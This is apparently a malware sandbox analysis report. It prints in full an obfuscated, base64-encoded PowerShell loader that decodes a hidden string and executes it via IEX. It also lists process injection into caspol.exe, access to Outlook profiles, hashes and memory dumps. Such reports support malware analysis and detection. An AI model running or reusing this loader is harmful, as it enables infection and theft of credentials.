cwBFAHQAYgByAHIAdABCAHIAdQBnAGUAZQBUAGkAbABmAG8AbQBEAGkAcwBhAHAATABzAG4AZABhAGcAbwBDAG8AbgBjAHUAYwBDAGgAYQBtAHAAYQB1AG4AYQBuAGcAbABVAG4AbABhAGIAZQBQAGkAawBlACAAcwBOAGUAdwB6AGUAQQBNAGEAcgBnAGkAKABQAHMAZQB1AGQAdQBDAHkAdABvAHAAaQBrAGEAcgB5AGEAbgBSAHUAbgBkAG4AdABDAG8AdQBuAHQAIABCAHIAZQBhAHMAdgBzAGUAZwBuAGUAMQBBAGEAcgBzAGEALABIAGEAbAB2AGQAaQBTAGwAdQBkAHIAbgBTAGsAIABLAGEAdABVAG4AZABlAHIAIABwAGEAaQBjAG8AdgBCAGwAeQBhAG4AMgBwAGkAcwB0AGEAKQBCAGUAcwB0AGEAOwAKAE8AdQB0AGIAcgB9AAoATwB2AGUAcgB2ACIATQB1AHMAYwBsAEAACgBFAHYAZQBjAHQAJABFAHYAYQBsAHUARQBFAHQAdABlAHIAbgBoAGUAbQBhAHQAdABKAGEAZABlACAAdwBQAGUAcgBtAGEAaQBCAHIAbgBkAHMAMwBzAHUAbQBwAGIAPQBBAGwAbwBwAGkAWwBFAHgAYwB1AHMARQBMAGkAbQBuAG8AbgBHAGUAbgBiAHIAdABNAGkAcwBnAHIAdwBIAGUAcwBwAGUAaQBLAG8AbABiAHQAMQBNAHUAbAB0AGkAXQBiAGUAZgBhAGUAOgBUAGkAbABzAGEAOgBQAG8AcwBlAHIAVgBwAGEAYwBoAHkAaQBVAGQAbABvAGUAcgBCAGkAcwB0AGEAdABSAGUAZwBsAGUAdQBGAG8AcgBnAHkAYQBTAHUAYgBjAHkAbABDAHIAdQBtAGIAQQBVAGsAbwBuAHQAbABSAGUAZABpAHYAbABOAG8AbgBzAGUAbwBHAGwAcwBuAGkAYwBVAGQAcwB0AHkAKABDAG8AZABhAGUAMABSAG8AcwBpAG4ALABVAG4AaQBuAGoAMQBaAG8AbgBlAGkAMABTAHQAbwBmAHAANABIAHUAbQBiAGwAOABJAG0AbQB5ACAANQBLAHYAYQBsAGkANwBMAG8AcgBpAGwANgBFAGQAYgBzACAALABTAG0AcwAgAEYAMQBVAHMAbwBsAGkAMgB1AGQAcgBlAG4AMgBTAHQAZQByAGMAOABCAHIAdQBnAHMAOABTAGMAeQBwAGgALABSAGEAdABpAG8ANgBVAG4AbgBvAGkANABTAGwAdQBrAG4AKQAKAFAAcgBvAGwAbwAkAFIAaQBwAG8AcwBEAE4AbwBuAHAAcgBhAG4AZQB1AHIAbwBnAEkAbgBkAGkAcwBsAFIAdQBuAGEAdwBpAGoAdQBtAGIAaQBnAEkAbgBlAGIAcgA9AGIAbwB5AGEAcgAoAEMAbABvAHQAaABHAGIAcgB5AGEAbgBlAFMAdABhAG0AbQB0AFYAcgBkAGkAZgAtAEQAbwBsAG0AZQBJAHUAZABzAGsAeQB0AFQAZQByAHUAdABlAFQAeQBsAG8AYwBtAEEAZgB0AGUAbgBQAFAAcgBlAGQAZQByAFMAdAByAGkAcABvAEQAeQBrAG4AaQBwAEMAZQBzAHQAdQBlAFMAdABhAHIAbAByAEsAYQB0AHQAZQB0AEwAaQBtAG0AZQB5AFAAYQBnAGUAaAAgAFMAZQBuAGcAZQAtAEYAcgBlAG0AZgBQAFQAZQBrAHMAdABhAEUAawBzAHAAYQB0AEEAbQBiAGwAeQBoAFAAZQBlAGsAcwAgAFMAdQBwAHAAbwAiAEsAbwBsAGwAZQBIAEkAbgBjAG8AcgBLAEMAaAByAGUAbQBDAEwAYQB0AHUAawBVAFIAYQBuAGcAbAA6AE0AaQBzAGIAZQBcAFMAdABlAGEAZABTAEEAZgB0AGUAZwBvAFMAawBhAGIAZQBmAFcAaQBlAHIAYQB0AEUAdABoAGUAcgB3AEIAcgBuAGUAcABhAFMAaQBuAGUAYwByAFMAdABvAHIAZgBlAEYAbwByAHAAYQBcAFIAZQBmAHUAcwBQAEIAbABhAGEAcABhAEIAZQBlAHQAbABsAE4AcgBlACAATABhAFMAdAB1AGMAawBlAFMAdABlAGEAdABvAEUAbABlAGMAdAB6AEkAbgBzAGkAcwBvAE4AbwBuAGUAeAAiAFkAdQByAHQAcwApAEIAcgBvAGQAZQAuAFQAYQBuAGsAYQBQAFYAaQBkAGUAbwB1AHQAZQBvAGQAbwBsAE8AZQBzAHQAZQBjAHQAcgBhAG4AcwAxAFQAZQBuAG4AaQAwAEYAbABhAGcAZQA1AAoAUwBwAGEAcgByACQATQBhAGMAaQBuAFcASwBkAGUAaABhAGkAQgByAHUAZwBzAHMAQQB1AHQAbwBtAGgAVABoAHkAcgBvAHQAcwB0AGEAYQBsAGsASQBuAGcAaQAgAG8AVAB3AGkAbgBiAG0AUwB1AGQAZQByAG0ARQB4AGEAbQBpACAAcwBrAG8AbQBhAD0ATABpAG0AbgBpACAAUwB1AHMAaQAgAFsAUwBvAHIAcgBvAFMAUwBrAHYAYQBsAHkASAB5AHAAcABlAHMARQB1AGwAbwBnAHQAUAB5AHIAbwBzAGUAcwB1AHAAZQByAG0AUwBvAGwAZgByAC4ASQBuAHMAbwBsAEMASwBrAGsAZQBuAG8AdABvAGwAdgB0AG4AUAB1AGUAcgBwAHYAYQBuAGQAbwByAGUAVgBhAGEAZAAgAHIAUAB5AGwAbwByAHQAdABhAHYAZQByAF0AUwB5AG4AdABvADoARQBxAHUAaQBsADoAVABhAGwAawB3AEYATQB1AG0AaQBlAHIAQQBiAG8AcgB0AG8ARwB1AGQAcwBmAG0AZwBhAHMAZgB5AEIAdQBkAHMAbQB5AGEAUwBxAHUAYQBtAHMAVQBmAGQAdABlAGUAcwBwAGkAbABsADYAUwB0AG8AbQBhADQAQQBuAGQAZQByAFMAUABvAGwAaQB0AHQASwB1AHYAZQByAHIAaQBuAGQAZQBuAGkAUwB0AHIAcgBlAG4AQwBsAGkAbgBpAGcATgB5AGgAZQBkACgARQB4AG8AbQBwACQATABpAHYAcwBtAEQAUgBlAHQAcgBhAGEAQQByAGsAdABpAGcAQQBmAGcAcgBzAGwAQgBhAGMAawB1AGkARABoAGEAcgBtAGcASwBvAHIAdABlACkACgBQAGEAbABtAGUAWwBEAGUAaQBuAGsAUwBmAGEAcgBhAG8AeQBNAG8AdABoAGUAcwBLAG8AbQBtAGEAdABqAGEAdQBuAGQAZQBUAGkAbABiAHUAbQBLAG8AbQBtAGEALgBTAGsAcgB1AG4AUgBTAGgAbwB3AGcAdQBBAG4AdABpAHQAbgBBAHIAYwBoAGUAdABDAGEAcABpAHQAaQBMAGEAcgByAGUAbQBFAGYAdABlAHIAZQBBAHQAdAByAGkALgBCAGEAYwB0AGUASQBMAGUAcAB0AG8AbgBEAGkAcwBwAGUAdABSAGEAdABpAGYAZQBHAGwAbwBiAGEAcgBBAGQAZQBuAG8AbwBCAHIAeQBzAHQAcABGAGwAYQBuAHIAUwBIAGkAeQBhAGsAZQBSAGUAdAByAGkAcgBQAGEAbgBkAGkAdgBkAHUAbQBtAGUAaQBIAGEAZgBnAGEAYwBOAG8AbgBjAHUAZQBkAHIAdQBrAG0AcwBCAGwAbwBkAHIALgBmAG8AcgB0AGgATQBQAGgAaQBsAG8AYQBJAGcAbgBhAHQAcgBtAGEAawBhAGIAcwBJAG4AcwB0AHIAaABBAGwAZABlAHIAYQBLAGEAcwBzAGUAbABNAGEAbABhAGMAXQBNAGcAdABpAGcAOgBEAGoAaQBiAG8AOgBTAHQAdQBtAG0AQwBTAHQAcgBhACAAbwBHAHIAdQBwAHAAcABVAG4AbQBvAGQAeQBSAGUAZwBpAHMAKABNAGQAZQB0AGkAJABEAGkAcwB0AHIAVwBGAGEAdQBuAGEAaQBZAG8AdQBuAGcAcwBCAGEAbQBiAHUAaABIAHUAbABrAG8AdABOAGEAaQBmACAAawBWAGUAbABhAG4AbwB2AGkAbgBkAGkAbQBBAGEAcgBzAHUAbQBQAHMAZQB1AGQALAB1AG4AYwBvAG4AIABTAGsAYQBtAHMAMABEAGkAbABkAG8ALABDAGgAYQBtAHAAIABQAHIAbwB0AG8AIABTAGEAbQBhAG4AJABQAHIAZQBlAGQARQBCAGwAbwBtAHMAbgBJAG4AZgBhAHIAdABMAHkAcwBhAGEAdwBKAHUAeAB0AGEAaQBMAGkAbQBmAGEAMwBTAGEAdQB2AGUALABIAGoAZQBtAG0AIABUAHkAbgBkAHMAJABEAG8AcgBvAHQAVwBEAHIAZQBhAG0AaQBQAGkAbQBwAGUAcwBSAGUAZwBuAGUAaABIAHUAcwBtAG4AdABBAHQAbQBvAGcAawBNAGEAbgBnAGUAbwBEAGQAcwBkAGEAbQBUAHUAcABhAGkAbQBCAHIAdQBnAGUALgBGAGUAcgByAHUAYwBUAGUAbABlAGYAbwBTAHQAcgBlAGEAdQBJAG4AdAByAGkAbgBPAHAAcABvAHMAdABTAGwAdQB0AHQAKQBNAGEAYwBhAHIAOwAKAE0AYQBuAGQAdQBbAEIAdQBtAG0AYQBFAFMAcwBzAHIAIABuAE0AYQBpAGQAYQB0AFQAYQBnAGUAdAB3AEIAaQBzAGUAbgBpAE0AbwBuAHQAZwAxAEgAZQByAG0AYQBdAEMAZQBuAHQAcgA6AEUAbgB0AGUAcgA6AFAAdQBsAHAAaQBFAE8AbQBnAHIAdQBuAFIAYQBwAHQAbwB1AE0AbwBkAGUAaABtAEwAaQBtAGkAdABTAFUAbgBoAGUAYQB5AEgAbwByAHQAbwBzAHMAZQByAHUAbQB0AFQAdwBhAGkAdABlAEEAawB0AGkAZQBtAFIAZQBnAGkAZQBMAFAAYQBuAGQAdQBvAFYAbwBsAGEAcABjAFMAbgByAGUAbABhAEMAYQBwAGkAbABsAE0AYQBhAGwAZQBlAE0AaQBkAHMAdABzAFMAdQBwAGUAcgBBAGUAcgBmAGEAcgAoAFMAbgBpAGcAbQAkAFMAawBvAG4AbgBFAFAAbwBkAGcAaQBuAEEAZgB0AGUAcgB0AFAAZQByAHMAbwB3AEkAbgBkAHQAcgBpAFQAcgB2AGUAcwAzAEIAcgBuAGUAbQAsAEYAbwBkAGIAbwAgAEEAbABkAGEAeQAwAE4AYQByAGsAbwApAEsAZQBtAGkAZwAjAAoAJwBAAA0ACgANAAoADQAKAEYAbwByACgAJABpAD0ANQA7ACAAJABpACAALQBsAHQAIAAkAEwAYQBwAHAAZQBuAHMAZgBpAC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQAVABlAHQAcgBhAHMAcABvAHIAbwAgAD0AIAAkAFQAZQB0AHIAYQBzAHAAbwByAG8AIAArACAAJABMAGEAcABwAGUAbgBzAGYAaQAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAxACkADQAKAAkADQAKAAkAaQBmACAAKAAkAEwAYQBwAHAAZQBuAHMAZgBpAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAFQAZQB0AHIAYQBzAHAAbwByAG8AIAA9ACAAJABUAGUAdAByAGEAcwBwAG8AcgBvACAAKwAgACIAYABuACIADQAKAAkACQAkAGkAIAA9ACAAJABpACAAKwAgADEADQAKAAkAfQAgAAkADQAKAAkACQANAAoACQANAAoAfQANAAoADQAKAA0ACgBJAEUAWAAgACQAVABlAHQAcgBhAHMAcABvAHIAbwANAAoA"
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ckeu1uel\ckeu1uel.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3880

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA55D.tmp" "c:\Users\Admin\AppData\Local\Temp\ckeu1uel\CSC41F7C9739CFB4083861B89771D71EAC.TMP"
4⤵
PID:388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
3⤵
PID:2408

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
3⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:4300

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA55D.tmp

Filesize
1KB

MD5
00410daf4d6831b0a1164c9ac44422c4

SHA1
f4e52a24abd2bba03ac935efdf7961fbec8956fb

SHA256
d921081e54fed2cc48c7893ac21b726f3bdce3121d5ce4e17bed2eadac95b692

SHA512
9a79280d3457cc9536c371800d4ccb3f71ca604fa42c5559080e6ea61781d303b4cdff7d70583c080d76069849a0b69512ec52fc0cbe29c8cec3c4c9a3d8dd61

Download Submit
C:\Users\Admin\AppData\Local\Temp\ckeu1uel\ckeu1uel.dll

Filesize
3KB

MD5
b0c6b4649a77c74aa264ea4fb8a69487

SHA1
da0fe14e8b270df8912684393bea746345a85ece

SHA256
10ab1cec37d9443143faec861b49eefef0675786acdeef451cbc44018c5bdad9

SHA512
24a62b9fcb91a2bb8c7452f7adac171a8ad8295950bad30c85c4d76c76b3699474cf3d1b2739acd5feb90257742f7949c941995904e2454075024c9e98b28bc6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ckeu1uel\CSC41F7C9739CFB4083861B89771D71EAC.TMP

Filesize
652B

MD5
483cf948a626d59593bd79a910169b59

SHA1
c13951ff4eda74d4fdcb5c000db8cc986bc96491

SHA256
70ed09f2440b5bddb47b1c94d4156d699081ff35d2491ed83ddb00cc246e77e7

SHA512
8a417c880b0590c558adcd52d0be9a73cc200b0026c215a4a739f7477a878f92413399587547746b3b958e9e342cafaba7bb3e77d817164d707f0c06963ace13

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ckeu1uel\ckeu1uel.0.cs

Filesize
789B

MD5
c90e793d8f1cc2305dc4db17fbab8638

SHA1
abf293e434e07382dd7dd68e1da98ea81af6ead9

SHA256
ce5c364582e9b46141a06dcb4c43bf0f5ee85684d14950fd20f054e6ef4d2d5a

SHA512
fd97f691216d0cff9990ccf0c6db19a6917edc4e43627316ed0223c293f7eeaa2372043c8d0114d78cc230fbc523c9e1eca29d73be28fb1e5f77df0fd4f8d07f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ckeu1uel\ckeu1uel.cmdline

Filesize
369B

MD5
1b12a4e8cdb8560d09d6c2bc2cc7531e

SHA1
5b5dc9851bc3cbfa7fc0ba85b05b907c88b20142

SHA256
e5840d2971ebc58b3a981befaa2e20ee549df30b96c71d554d25402f6a993e0e

SHA512
5e71e0c3217913b7b3775b5d2e161a26b6e5bef832b5d149f5de50876443abdb1e69aae5ff322d4f4036ccc1cb1935caa55272f00839eceb6e40c6e8b8b13e56

Download Submit
memory/388-144-0x0000000000000000-mapping.dmp

Download
memory/1440-152-0x00007FF98F9D0000-0x00007FF98FBC5000-memory.dmp

Filesize
2.0MB

Download
memory/1440-155-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/1440-140-0x0000000007500000-0x000000000751A000-memory.dmp

Filesize
104KB

Download
memory/1440-165-0x0000000007580000-0x0000000007680000-memory.dmp

Filesize
1024KB

Download
memory/1440-138-0x00000000063E0000-0x00000000063FE000-memory.dmp

Filesize
120KB

Download
memory/1440-137-0x0000000005CA0000-0x0000000005D06000-memory.dmp

Filesize
408KB

Download
memory/1440-136-0x0000000005540000-0x00000000055A6000-memory.dmp

Filesize
408KB

Download
memory/1440-135-0x0000000005490000-0x00000000054B2000-memory.dmp

Filesize
136KB

Download
memory/1440-134-0x0000000005600000-0x0000000005C28000-memory.dmp

Filesize
6.2MB

Download
memory/1440-133-0x0000000004E90000-0x0000000004EC6000-memory.dmp

Filesize
216KB

Download
memory/1440-148-0x0000000007750000-0x00000000077E6000-memory.dmp

Filesize
600KB

Download
memory/1440-149-0x00000000076E0000-0x0000000007702000-memory.dmp

Filesize
136KB

Download
memory/1440-150-0x0000000008960000-0x0000000008F04000-memory.dmp

Filesize
5.6MB

Download
memory/1440-151-0x0000000007580000-0x0000000007680000-memory.dmp

Filesize
1024KB

Download
memory/1440-132-0x0000000000000000-mapping.dmp

Download
memory/1440-153-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/1440-139-0x0000000007D30000-0x00000000083AA000-memory.dmp

Filesize
6.5MB

Download
memory/3880-141-0x0000000000000000-mapping.dmp

Download
memory/4300-164-0x000000001F580000-0x000000001F61C000-memory.dmp

Filesize
624KB

Download
memory/4300-163-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/4300-158-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/4300-159-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/4300-156-0x0000000000B50000-0x0000000000C50000-memory.dmp

Filesize
1024KB

Download
memory/4300-160-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4300-157-0x00007FF98F9D0000-0x00007FF98FBC5000-memory.dmp

Filesize
2.0MB

Download
memory/4300-154-0x0000000000000000-mapping.dmp

Download
memory/4300-161-0x0000000000401000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4300-166-0x0000000000B50000-0x0000000000C50000-memory.dmp

Filesize
1024KB

Download
memory/4300-167-0x00000000201E0000-0x0000000020230000-memory.dmp

Filesize
320KB

Download
memory/4300-168-0x00000000207E0000-0x0000000020872000-memory.dmp

Filesize
584KB

Download
memory/4300-169-0x00000000207A0000-0x00000000207AA000-memory.dmp

Filesize
40KB

Download
memory/4300-170-0x00007FF98F9D0000-0x00007FF98FBC5000-memory.dmp

Filesize
2.0MB

Download
memory/4300-171-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/4300-172-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads